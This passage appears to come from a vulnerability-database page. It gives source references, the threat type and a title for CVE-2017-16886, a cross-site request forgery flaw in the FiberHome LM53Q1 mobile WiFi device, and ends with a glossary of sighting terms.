"date": "2018-02-02T00:00:00",
"db": "VULHUB",
"id": "VHN-107853"
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-012102"
},
{
"date": "2018-01-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-805"
},
{
"date": "2024-11-21T03:17:10.810000",
"db": "NVD",
"id": "CVE-2017-16886"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-805"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FiberHome mobile WIFI Device model LM53Q1 Vulnerable to cross-site request forgery",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-805"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…